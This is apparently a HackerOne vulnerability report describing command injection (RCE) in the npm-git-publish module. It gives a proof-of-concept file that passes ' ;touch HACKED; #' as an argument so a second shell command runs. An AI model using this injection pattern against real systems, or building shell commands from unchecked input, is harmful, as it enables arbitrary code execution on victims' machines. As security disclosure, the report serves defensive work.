Node.js third-party modules: [npm-git-publish] RCE via insecure command formatting

ID H1:730121
Type hackerone
Reporter mik317
Modified 2020-01-11T12:08:21


I would like to report a RCE issue in the npm-git-publish module. It allows to execute arbitrary commands remotely inside the victim's PC


module name: npm-git-publish version: 0.2.4-beta npm page:

Module Description

> Share/publish private packages using Git remotes!

Module Stats

[~70] downloads in the last day [268] downloads in the last week [~1k] downloads in the last month

Vulnerability Description

The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here:

Steps To Reproduce:

  1. Create the following PoC file:

```js // poc.js var git = require('npm-git-publish'); git.publish('.', ' ;touch HACKED; #')

`` 1. Check there aren't files calledHACKED` 1. Execute the following commands in another terminal:

bash npm i npm-git-publish # Install affected module node poc.js # Run the PoC 1. Recheck the files: now HACKED has been created :) {F626780}


> Don't format commands using insecure user's inputs :)

Supporting Material/References:

  • [NODEJS VERSION]: 10.16.3
  • [NPM VERSION]: 6.0.9

Wrap up

  • I contacted the maintainer to let them know: [N]
  • I opened an issue in the related repository: [N]


RCE via command formatting on npm-git-publish